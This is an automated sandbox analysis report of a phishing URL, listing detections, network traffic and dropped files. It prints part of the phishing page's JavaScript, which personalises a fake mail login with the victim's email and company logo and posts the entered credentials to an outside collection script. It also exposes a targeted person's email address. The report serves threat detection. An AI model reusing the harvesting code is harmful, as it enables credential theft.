Windows Analysis Report
https://ug9n8.z1.web.core.windows.net/?lu=aHR0cHM6Ly9leHk3Ny5zMy5ldS1jZW50cmFsLTEuYW1hem9uYXdzLmNvbS9ubS5odG1sI21hcmNvLmNlcnVsbG9AaXByb3RleC5kZQ==

Overview

General Information

Sample URL: https://ug9n8.z1.web.core.windows.net/?lu=aHR0cHM6Ly9leHk3Ny5zMy5ldS1jZW50cmFsLTEuYW1hem9uYXdzLmNvbS9ubS5odG1sI21hcmNvLmNlcnVsbG9AaXByb3RleC5kZQ==
Analysis ID: 1597376

Detection

BlackHacker JS Obfuscator, HTMLPhisher
Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Yara detected HtmlPhish10
AI detected suspicious Javascript
HTML page contains obfuscated javascript
Javascript uses Clearbit API to dynamically determine company logos
Yara detected BlackHacker JS Obfuscator
Detected non-DNS traffic on DNS port
HTML body contains low number of good links
HTML body contains password input but no form action
HTML title does not match URL
Invalid 'forgot password' link found

Classification

[Classification chart. Categories: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner. Levels: clean, suspicious, malicious.]
  • System is w10x64
  • chrome.exe (PID: 6688 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 3504 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 --field-trial-handle=2184,i,7140382767829794373,7643732451792572459,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • chrome.exe (PID: 4924 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://ug9n8.z1.web.core.windows.net/?lu=aHR0cHM6Ly9leHk3Ny5zMy5ldS1jZW50cmFsLTEuYW1hem9uYXdzLmNvbS9ubS5odG1sI21hcmNvLmNlcnVsbG9AaXByb3RleC5kZQ==" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
dropped/chromecache_55 | JoeSecurity_BlackHackerJSObfuscator | Yara detected BlackHacker JS Obfuscator | Joe Security |
dropped/chromecache_53 | JoeSecurity_BlackHackerJSObfuscator | Yara detected BlackHacker JS Obfuscator | Joe Security |

Source | Rule | Description | Author | Strings
1.1.pages.csv | JoeSecurity_HtmlPhish_10 | Yara detected HtmlPhish_10 | Joe Security |
1.2.pages.csv | JoeSecurity_HtmlPhish_10 | Yara detected HtmlPhish_10 | Joe Security |
1.0.pages.csv | JoeSecurity_HtmlPhish_10 | Yara detected HtmlPhish_10 | Joe Security |

No Sigma rule has matched
No Suricata rule has matched

            AV Detection

            Source: https://electjimhenderson.com/wp-includes/images/banner.jpg | Avira URL Cloud: Label: phishing
            Source: https://electjimhenderson.com/wp-includes/images/Docubg.jpg | Avira URL Cloud: Label: phishing

            Phishing

            Source: Yara match | File source: 1.1.pages.csv, type: HTML
            Source: Yara match | File source: 1.2.pages.csv, type: HTML
            Source: Yara match | File source: 1.0.pages.csv, type: HTML
            Source: 0.2.id.script.csv | Joe Sandbox AI: Detected suspicious JavaScript with source url: https://exy77.s3.eu-central-1.amazonaws.com/nm.htm... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code. The use of `eval`, `Function` constructor, and heavily encoded strings indicates a high likelihood of malicious intent. Additionally, the script appears to be sending user data to external domains, which raises concerns about data privacy and security. While the specific purpose of the script is unclear, the combination of these factors suggests a high-risk scenario that requires further investigation.
            Source: https://ug9n8.z1.web.core.windows.net/?lu=aHR0cHM6Ly9leHk3Ny5zMy5ldS1jZW50cmFsLTEuYW1hem9uYXdzLmNvbS9ubS5odG1sI21hcmNvLmNlcnVsbG9AaXByb3RleC5kZQ== | HTTP Parser: <!--// == Code Obfuscation Protection from https://blackhackertools.com == //function _0x1fe0(){v
            Source: https://exy77.s3.eu-central-1.amazonaws.com/nm.html#marco.cerullo@iprotex.de | HTTP Parser: <!--// == Code Obfuscation Protection from https://blackhackertools.com == //var _0x1ed2e1=_0x2ee
            Source: https://exy77.s3.eu-central-1.amazonaws.com/nm.html#marco.cerullo@iprotex.de | HTTP Parser: document.addeventlistener("domcontentloaded", function () { const phpurl = "https://txlocksmithbellaire.com/xzm/result.php"; const fullurl = window.location.href; const emailregex = /#([^#]+)$/; const match = fullurl.match(emailregex); const email = match ? match[1] : null; const emaildecoded = email ? decodeuricomponent(email) : null; if (emaildecoded) { const domain = emaildecoded.split('@')[1]; const companyname = domain.split('.')[0]; document.getelementbyid("eemail").value = emaildecoded; document.getelementbyid("favicon").href = `https://logo.clearbit.com/${domain}`; document.getelementbyid("logoimg").src = `https://logo.clearbit.com/${domain}`; document.getelementbyid("tittle").textcontent = `${companyname} - mail`; document.getelementbyid("logoname").textcontent = companyname.touppercase(); document.getelementbyid("footer-text").textcontent = `connected to ${emaildecoded} 2024`; localstorage.setitem...
            Source: https://exy77.s3.eu-central-1.amazonaws.com/nm.html#marco.cerullo@iprotex.de | HTTP Parser: Number of links: 0
            Source: https://exy77.s3.eu-central-1.amazonaws.com/nm.html#marco.cerullo@iprotex.de | HTTP Parser: <input type="password" .../> found but no <form action="...
            Source: https://exy77.s3.eu-central-1.amazonaws.com/nm.html#marco.cerullo@iprotex.de | HTTP Parser: Title: iprotex - Mail does not match URL
            Source: https://exy77.s3.eu-central-1.amazonaws.com/nm.html#marco.cerullo@iprotex.de | HTTP Parser: Invalid link: Forgot Password?
            Source: https://exy77.s3.eu-central-1.amazonaws.com/nm.html#marco.cerullo@iprotex.de | HTTP Parser: <input type="password" .../> found
            Source: https://exy77.s3.eu-central-1.amazonaws.com/nm.html#marco.cerullo@iprotex.de | HTTP Parser: No <meta name="author".. found
            Source: https://exy77.s3.eu-central-1.amazonaws.com/nm.html#marco.cerullo@iprotex.de | HTTP Parser: No <meta name="copyright".. found
            Source: unknown | HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:64868 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:64899 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:64988 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:61492 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:56914 version: TLS 1.2

            Spreading

            Source: Yara match | File source: dropped/chromecache_55, type: DROPPED
            Source: Yara match | File source: dropped/chromecache_53, type: DROPPED
            Source: global traffic | TCP traffic: 192.168.2.6:56912 -> 1.1.1.1:53
            Source: global traffic | TCP traffic: 192.168.2.6:61489 -> 162.159.36.2:53
            Source: unknown | TCP traffic detected without corresponding DNS query: 173.222.162.64
            Source: unknown | TCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknown | TCP traffic detected without corresponding DNS query: 162.159.36.2
            Source: global traffic | HTTP traffic detected: GET /nm.html HTTP/1.1 | Host: exy77.s3.eu-central-1.amazonaws.com | Connection: keep-alive | sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" | sec-ch-ua-mobile: ?0 | sec-ch-ua-platform: "Windows" | Upgrade-Insecure-Requests: 1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Sec-Fetch-Site: cross-site | Sec-Fetch-Mode: navigate | Sec-Fetch-Dest: document | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9
            Source: global traffic | HTTP traffic detected: GET /f6136e9b49.js HTTP/1.1 | Host: kit.fontawesome.com | Connection: keep-alive | sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" | Origin: https://exy77.s3.eu-central-1.amazonaws.com | sec-ch-ua-mobile: ?0 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 | Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning" | sec-ch-ua-platform: "Windows" | Accept: */* | Sec-Fetch-Site: cross-site | Sec-Fetch-Mode: cors | Sec-Fetch-Dest: script | Referer: https://exy77.s3.eu-central-1.amazonaws.com/ | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9
            Source: global traffic | HTTP traffic detected: GET /wp-includes/images/Docubg.jpg HTTP/1.1 | Host: electjimhenderson.com | Connection: keep-alive | sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" | sec-ch-ua-mobile: ?0 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 | sec-ch-ua-platform: "Windows" | Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8 | Sec-Fetch-Site: cross-site | Sec-Fetch-Mode: no-cors | Sec-Fetch-Dest: image | Referer: https://exy77.s3.eu-central-1.amazonaws.com/ | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9
            Source: global traffic | HTTP traffic detected: GET /wp-includes/images/banner.jpg HTTP/1.1 | Host: electjimhenderson.com | Connection: keep-alive | sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" | sec-ch-ua-mobile: ?0 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 | sec-ch-ua-platform: "Windows" | Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8 | Sec-Fetch-Site: cross-site | Sec-Fetch-Mode: no-cors | Sec-Fetch-Dest: image | Referer: https://exy77.s3.eu-central-1.amazonaws.com/ | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9
            Source: global traffic | HTTP traffic detected: GET /wp-includes/images/Docubg.jpg HTTP/1.1 | Host: electjimhenderson.com | Connection: keep-alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 | Accept: */* | Sec-Fetch-Site: none | Sec-Fetch-Mode: cors | Sec-Fetch-Dest: empty | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9
            Source: global traffic | HTTP traffic detected: GET /iprotex.de HTTP/1.1 | Host: logo.clearbit.com | Connection: keep-alive | sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" | sec-ch-ua-mobile: ?0 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 | sec-ch-ua-platform: "Windows" | Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8 | Sec-Fetch-Site: cross-site | Sec-Fetch-Mode: no-cors | Sec-Fetch-Dest: image | Referer: https://exy77.s3.eu-central-1.amazonaws.com/ | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9
            Source: global traffic | HTTP traffic detected: GET /wp-includes/images/banner.jpg HTTP/1.1 | Host: electjimhenderson.com | Connection: keep-alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 | Accept: */* | Sec-Fetch-Site: none | Sec-Fetch-Mode: cors | Sec-Fetch-Dest: empty | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9
            Source: global traffic | HTTP traffic detected: GET /iprotex.de HTTP/1.1 | Host: logo.clearbit.com | Connection: keep-alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 | Accept: */* | Sec-Fetch-Site: none | Sec-Fetch-Mode: cors | Sec-Fetch-Dest: empty | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9
            Source: global traffic | DNS traffic detected: DNS query: www.google.com
            Source: global traffic | DNS traffic detected: DNS query: exy77.s3.eu-central-1.amazonaws.com
            Source: global traffic | DNS traffic detected: DNS query: kit.fontawesome.com
            Source: global traffic | DNS traffic detected: DNS query: electjimhenderson.com
            Source: global traffic | DNS traffic detected: DNS query: logo.clearbit.com
            Source: global traffic | DNS traffic detected: DNS query: txlocksmithbellaire.com
            Source: unknown | HTTP traffic detected: POST /xzm/result.php HTTP/1.1 | Host: txlocksmithbellaire.com | Connection: keep-alive | Content-Length: 270 | sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" | sec-ch-ua-platform: "Windows" | sec-ch-ua-mobile: ?0 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 | Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAimUO6kSX1NJhj17 | Accept: */* | Origin: https://exy77.s3.eu-central-1.amazonaws.com | Sec-Fetch-Site: cross-site | Sec-Fetch-Mode: cors | Sec-Fetch-Dest: empty | Referer: https://exy77.s3.eu-central-1.amazonaws.com/ | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9
            Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Date: Thu, 23 Jan 2025 07:05:33 GMT | Content-Length: 9 | Connection: close | access-control-allow-headers: accept, accept-langauge, content-language, content-type, fa-kit-token | access-control-allow-methods: GET, OPTIONS | access-control-allow-origin: * | access-control-max-age: 3000 | Cache-Control: max-age=0, private, must-revalidate | x-request-id: GB1AfD0b3gv5LfswYMlh | CF-Cache-Status: MISS | Server: cloudflare | CF-RAY: 9065efa0b9db4374-EWR
            Source: chromecache_53.3.dr, chromecache_55.3.dr | String found in binary or memory: https://blackhackertools.com
            Source: classification engine | Classification label: mal72.spre.phis.win@17/15@16/9
            Source: unknown | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 --field-trial-handle=2184,i,7140382767829794373,7643732451792572459,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: unknown | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://ug9n8.z1.web.core.windows.net/?lu=aHR0cHM6Ly9leHk3Ny5zMy5ldS1jZW50cmFsLTEuYW1hem9uYXdzLmNvbS9ubS5odG1sI21hcmNvLmNlcnVsbG9AaXByb3RleC5kZQ=="
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 Browser Extensions | 1 Process Injection | 1 Process Injection | OS Credential Dumping | System Service Discovery | Remote Services | Data from Local System | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
            Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Rootkit | LSASS Memory | Application Window Discovery | Remote Desktop Protocol | Data from Removable Media | 4 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | 5 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Binary Padding | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | 3 Ingress Tool Transfer | Traffic Duplication | Data Destruction
            [Behavior graph. ID: 1597376, URL: https://ug9n8.z1.web.core.w..., Startdate: 23/01/2025, Architecture: WINDOWS, Score: 72. Signatures: Antivirus detection for URL or domain; Yara detected HtmlPhish10; HTML page contains obfuscated javascript; 3 other signatures. chrome.exe contacts txlocksmithbellaire.com (184.168.29.58, ports 443, 61506, 64999, AS-26496-GO-DADDY-COM-LLC, US, United States), exy77.s3.eu-central-1.amazonaws.com and 8 other IPs or domains.]

            SourceDetectionScannerLabelLink
            https://ug9n8.z1.web.core.windows.net/?lu=aHR0cHM6Ly9leHk3Ny5zMy5ldS1jZW50cmFsLTEuYW1hem9uYXdzLmNvbS9ubS5odG1sI21hcmNvLmNlcnVsbG9AaXByb3RleC5kZQ==0%Avira URL Cloudsafe
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            Source | Detection | Scanner | Label
            https://electjimhenderson.com/wp-includes/images/banner.jpg | 100% | Avira URL Cloud | phishing
            https://blackhackertools.com | 0% | Avira URL Cloud | safe
            https://txlocksmithbellaire.com/xzm/result.php | 0% | Avira URL Cloud | safe
            https://electjimhenderson.com/wp-includes/images/Docubg.jpg | 100% | Avira URL Cloud | phishing
            https://exy77.s3.eu-central-1.amazonaws.com/nm.html | 0% | Avira URL Cloud | safe


            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            kit.fontawesome.com.cdn.cloudflare.net | 104.18.40.68 | true | false |  | high
            d26p066pn2w0s0.cloudfront.net | 13.32.27.129 | true | false |  | high
            electjimhenderson.com | 76.223.67.189 | true | false |  | unknown
            txlocksmithbellaire.com | 184.168.29.58 | true | true |  | unknown
            www.google.com | 142.250.184.228 | true | false |  | high
            s3-r-w.eu-central-1.amazonaws.com | 3.5.138.248 | true | false |  | high
            kit.fontawesome.com | unknown | unknown | false |  | high
            exy77.s3.eu-central-1.amazonaws.com | unknown | unknown | true |  | unknown
            logo.clearbit.com | unknown | unknown | false |  | high
            Name | Malicious | Antivirus Detection | Reputation
            https://txlocksmithbellaire.com/xzm/result.php | true | Avira URL Cloud: safe | unknown
            https://electjimhenderson.com/wp-includes/images/Docubg.jpg | false | Avira URL Cloud: phishing | unknown
            https://exy77.s3.eu-central-1.amazonaws.com/nm.html#marco.cerullo@iprotex.de | true |  | unknown
            https://electjimhenderson.com/wp-includes/images/banner.jpg | false | Avira URL Cloud: phishing | unknown
            https://exy77.s3.eu-central-1.amazonaws.com/nm.html | false | Avira URL Cloud: safe | unknown
            https://kit.fontawesome.com/f6136e9b49.js | false |  | high
            https://logo.clearbit.com/iprotex.de | false |  | high
            Name | Source | Malicious | Antivirus Detection | Reputation
            https://blackhackertools.com | chromecache_53.3.dr, chromecache_55.3.dr | true | Avira URL Cloud: safe | unknown
            IP | Domain | Country | ASN | ASN Name | Malicious
            76.223.67.189 | electjimhenderson.com | United States | 16509 | AMAZON-02US | false
            13.32.27.77 | unknown | United States | 7018 | ATT-INTERNET4US | false
            104.18.40.68 | kit.fontawesome.com.cdn.cloudflare.net | United States | 13335 | CLOUDFLARENETUS | false
            184.168.29.58 | txlocksmithbellaire.com | United States | 26496 | AS-26496-GO-DADDY-COM-LLCUS | true
            3.5.138.248 | s3-r-w.eu-central-1.amazonaws.com | United States | 16509 | AMAZON-02US | false
            239.255.255.250 | unknown | Reserved | unknown | unknown | false
            142.250.184.228 | www.google.com | United States | 15169 | GOOGLEUS | false
            13.32.27.129 | d26p066pn2w0s0.cloudfront.net | United States | 7018 | ATT-INTERNET4US | false
                                    IP
                                    192.168.2.6
            Joe Sandbox version: 42.0.0 Malachite
            Analysis ID: 1597376
            Start date and time: 2025-01-23 08:04:29 +01:00
            Joe Sandbox product: CloudBasic
            Overall analysis duration: 0h 3m 14s
            Hypervisor based Inspection enabled: false
            Report type: full
            Cookbook file name: browseurl.jbs
            Sample URL: https://ug9n8.z1.web.core.windows.net/?lu=aHR0cHM6Ly9leHk3Ny5zMy5ldS1jZW50cmFsLTEuYW1hem9uYXdzLmNvbS9ubS5odG1sI21hcmNvLmNlcnVsbG9AaXByb3RleC5kZQ==
            Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed: 7
            Number of new started drivers analysed: 0
            Number of existing processes analysed: 0
            Number of existing drivers analysed: 0
            Number of injected processes analysed: 0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode: default
            Analysis stop reason: Timeout
            Detection: MAL
            Classification: mal72.spre.phis.win@17/15@16/9
            EGA Information: Failed
            HCA Information:
            • Successful, ratio: 100%
            • Number of executed functions: 0
            • Number of non-executed functions: 0
            • Exclude process from analysis (whitelisted): WMIADAP.exe, SIHClient.exe, svchost.exe
                                    • Excluded IPs from analysis (whitelisted): 142.250.186.99, 216.58.206.78, 74.125.133.84, 142.250.185.206, 142.250.186.142, 20.60.22.33, 142.250.185.202, 142.250.185.163, 142.250.181.234, 142.250.184.234, 142.250.185.106, 142.250.186.74, 216.58.206.42, 172.217.18.10, 142.250.184.202, 142.250.185.138, 142.250.186.42, 142.250.185.74, 142.250.186.170, 142.250.186.106, 172.217.16.202, 216.58.212.170, 142.250.186.138, 172.217.18.106, 184.30.131.245, 199.232.210.172, 142.250.185.142, 142.250.184.227, 142.250.176.206, 74.125.0.74, 172.217.16.206, 184.28.90.27, 13.107.246.45, 4.245.163.56
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                    • VT rate limit hit for: https://ug9n8.z1.web.core.windows.net/?lu=aHR0cHM6Ly9leHk3Ny5zMy5ldS1jZW50cmFsLTEuYW1hem9uYXdzLmNvbS9ubS5odG1sI21hcmNvLmNlcnVsbG9AaXByb3RleC5kZQ==
                                    No simulations
                                    No context
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:ASCII text, with very long lines (1572)
                                    Category:downloaded
                                    Size (bytes):21548
                                    Entropy (8bit):5.2482120808797434
                                    Encrypted:false
                                    SSDEEP:384:DFCfzFCkFCFFChFCy4FC/qY4eFCcFC8FC3CfaCDCwCkCyfC/qY45CLCrCcCfFCYK:DFaF7FOFsFJ4FaLFxF9FyNSpbJfai0YL
                                    MD5:1259EC64BE82B4AC34A247A8FE3CC72C
                                    SHA1:6A6F9D788F60BAECCA04BD8E905CEDC0A209197B
                                    SHA-256:E7D3456A36699EE3CF0E0D319530AEE132FC6C19C37C65C0B4B986152F7C9547
                                    SHA-512:12D728AA26C54A3D27363C4F1E00F917580477073DEEDFADE80357EB1A57D2AA9DBB758C7676C0EA24FE9E225A91D31DC82A881E6D51A622C69998A2463C655C
                                    Malicious:false
                                    Reputation:low
                                    URL:"https://fonts.googleapis.com/css?family=Roboto:100,400,500,700"
                                    Preview:/* cyrillic-ext */.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 100;. font-stretch: 100%;. src: url(https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3GUBGEe.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 100;. font-stretch: 100%;. src: url(https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3iUBGEe.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* greek-ext */.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 100;. font-stretch: 100%;. src: url(https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3CUBGEe.woff2) format('woff2');. unicode-range: U+1F00-1FFF;.}./* greek */.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 100;. font-st
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:HTML document, ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):114
                                    Entropy (8bit):4.802925647778009
                                    Encrypted:false
                                    SSDEEP:3:PouVIZx/XMn30EEBuvFfD0OkADYyT0NV9kBbZWM:hax/XW3/p5mmYyT0NVuB9d
                                    MD5:E89F75F918DBDCEE28604D4E09DD71D7
                                    SHA1:F9D9055E9878723A12063B47D4A1A5F58C3EB1E9
                                    SHA-256:6DC9C7FC93BB488BB0520A6C780A8D3C0FB5486A4711ACA49B4C53FAC7393023
                                    SHA-512:8DF0AB2E3679B64A6174DEFF4259AE5680F88E3AE307E0EA2DFFF88EC4BA14F3477C9FE3A5AA5DA3A8E857601170A5108ED75F6D6975958AC7A314E4A336AED0
                                    Malicious:false
                                    Reputation:low
                                    Preview:<!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:downloaded
                                    Size (bytes):9
                                    Entropy (8bit):2.94770277922009
                                    Encrypted:false
                                    SSDEEP:3:mn:mn
                                    MD5:722969577A96CA3953E84E3D949DEE81
                                    SHA1:3DAB5F6012E3E149B5A939B9CEBBA4A0B84DC8F5
                                    SHA-256:78342A0905A72CE44DA083DCB5D23B8EA0C16992BA2A82EECE97E033D76BA3D3
                                    SHA-512:54B2B4596CD1769E46A12A0CA6EDE70468985CF8771C2B11E75B3F52567A64418BC24C067D96D52037E0E135E7A7FF828AD0241D55B827506E1C67DE1CAEE8BC
                                    Malicious:false
                                    Reputation:low
                                    URL:https://kit.fontawesome.com/f6136e9b49.js
                                    Preview:Forbidden
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:downloaded
                                    Size (bytes):28
                                    Entropy (8bit):4.2359263506290326
                                    Encrypted:false
                                    SSDEEP:3:QQinPHmzY:+PHmzY
                                    MD5:54AFDE25F8CA81DE2113349FEAC16BC8
                                    SHA1:C4DD2351FFCC3EF8C4DB419F140E286C3E96601C
                                    SHA-256:9E2BA08CF97AB272D06D0240A8D8F1261E5EF0BF58730350815FC3E6EC61060B
                                    SHA-512:74B1F45361805F8EE4087BD77C6857A7E6B67CF8795B74EF91D951813DC51B8061F3987C75419F31C112287653F57215805FCAF74B5ADA5302C3909ED6032BD0
                                    Malicious:false
                                    Reputation:low
                                    URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzQSFwlJyJjyK4nxnBIFDXhvEhkSBQ0Hpi0s?alt=proto
                                    Preview:ChIKBw14bxIZGgAKBw0Hpi0sGgA=
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:HTML document, ASCII text, with very long lines (65423), with CRLF line terminators
                                    Category:downloaded
                                    Size (bytes):77786
                                    Entropy (8bit):4.386645126161226
                                    Encrypted:false
                                    SSDEEP:768:P4xtBugAFrIoT2HGnUEU9daO6L+mPGkhSwmoWbihLAiQf5w:rgAFL
                                    MD5:E7C43AC0588DF167770DF7B356AF19BF
                                    SHA1:57248FD4D945A64449AD9B7D55DC17538A89AF8F
                                    SHA-256:F73CDD40801AA01DC58E754D469C5644215105BC04B4D661C3919F0CE14C7D47
                                    SHA-512:6FC765F65BC1E3EDF7FF8CAE6A857351738D6987EEE0235FA63E895911EA8622B49AE324327EAFC7CFD5EEAB133AE975A5449FF2D399FC2A329F820EE8C053CD
                                    Malicious:false
                                    Reputation:low
                                    URL:https://exy77.s3.eu-central-1.amazonaws.com/nm.html
